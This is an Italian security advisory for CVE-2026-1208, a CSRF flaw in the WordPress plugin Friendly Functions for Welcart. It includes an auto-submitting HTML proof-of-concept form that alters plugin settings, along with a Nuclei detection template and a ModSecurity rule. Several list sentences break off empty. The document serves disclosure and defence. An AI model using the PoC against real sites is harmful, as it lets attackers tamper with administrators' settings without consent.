
Friendly Functions for Welcart <= 1.2.5 - Cross-Site Request Forgery per Aggiornamento Impostazioni
Parole chiave: CVE-2026-1208, vulnerabilità Friendly Functions for Welcart, CSRF, Cross-Site Request Forgery, sicurezza WordPress, vulnerabilità plugin WordPress, CWE-352, sicurezza Welcart, manipolazione impostazioni, WordPress CVE 2026
Vulnerabilità CSRF nel plugin WordPress Friendly Functions for Welcart (CVE-2026-1208) - Falla di sicurezza che consente ad attaccanti non autenticati di modificare le impostazioni del plugin tramite richieste contraffatte.
È stata scoperta una vulnerabilità di Cross-Site Request Forgery (CSRF) nel plugin Friendly Functions for Welcart che permette ad attaccanti non autenticati di aggiornare le impostazioni del plugin ingannando un amministratore affinché clicchi su un link malevolo.
Scoperta da: Kai Aizen (SnailSploit)
Pubblicata: 23 gennaio 2026
Punteggio CVSS: 4.3 (Medio)
CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
Plugin: Friendly Functions for Welcart
Tipo di attacco: Cross-Site Request Forgery per aggiornamento impostazioni
Privilegi richiesti: Nessuno (Attacco non autenticato + Ingegneria sociale)
Il plugin Friendly Functions for Welcart per WordPress è vulnerabile a Cross-Site Request Forgery in tutte le versioni fino alla 1.2.5 inclusa. Ciò è dovuto alla mancanza o all'errata validazione del nonce nella pagina delle impostazioni. Questo permette ad attaccanti non autenticati di aggiornare le impostazioni del plugin tramite una richiesta contraffatta, a condizione che riescano a indurre un amministratore del sito a compiere un'azione come cliccare su un link.
Questa vulnerabilità consente ad attaccanti non autenticati di:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
| Metrica | Valore |
|---|---|
| Vettore d'Attacco | Rete (AV:N) |
| Complessità dell'Attacco | Bassa (AC:L) |
| Privilegi Richiesti | Nessuno (PR:N) |
| Interazione dell'Utente | Richiesta (UI:R) |
| Ambito | Invariato (S:U) |
| Riservatezza | Nessuna (C:N) |
| Integrità | Bassa (I:L) |
| Disponibilità | Nessuna (A:N) |
La vulnerabilità risiede nell'implementazione della pagina delle impostazioni dove:
La vulnerabilità è stata identificata nelle seguenti posizioni:
ffw_function_settings.php - Riga 53ffw_function_settings.php - Riga 58L'attacco richiede ingegneria sociale per indurre un amministratore autenticato a visitare una pagina malevola o a cliccare su un link appositamente costruito mentre è loggato nel proprio sito WordPress.
Target: Amministratore WordPress con Friendly Functions for Welcart installato
Metodo: Pagina HTML malevola con modulo auto-inviante
Trigger: L'amministratore clicca su un link o visita una pagina controllata dall'attaccante
<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-1208 - PoC CSRF</title>
</head>
<body>
<h1>Caricamento in corso...</h1>
<form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
<input type="hidden" name="ffw_setting_option" value="valore_malevolo" />
<!-- Aggiungere ulteriori campi delle impostazioni secondo necessità -->
</form>
<script>
document.getElementById('csrf-form').submit();
</script>
</body>
</html>
⚠️ Avvertenza: Questo PoC è fornito esclusivamente a scopo educativo e per test autorizzati.
# Verificare se è installata una versione vulnerabile
wp plugin list | grep -i "friendly-functions-for-welcart"
# Ottenere la versione specifica
wp plugin get friendly-functions-for-welcart --field=version
Template Nuclei:
id: CVE-2026-1208
info:
name: Friendly Functions for Welcart - CSRF per aggiornamento impostazioni
author: SnailSploit
severity: medium
description: |
Il plugin Friendly Functions for Welcart per WordPress è vulnerabile
a CSRF nelle versioni <= 1.2.5 a causa della mancanza di validazione del nonce.
reference:
- https://github.com/SnailSploit/CVE-2026-1208
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2026-1208
cwe-id: CWE-352
tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
matchers-condition: and
matchers:
- type: word
words:
- "Friendly Functions for Welcart"
- type: regex
regex:
- "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- "(?i)Stable tag:\\s*([0-9.]+)"
Regola ModSecurity:
# CVE-2026-1208 - Blocca tentativi CSFR verso le impostazioni FFW
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
log,deny,status:403,msg:'CVE-2026-1208 Tentativo CSRF Bloccato'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule &REQUEST_HEADERS:Referer "@eq 0"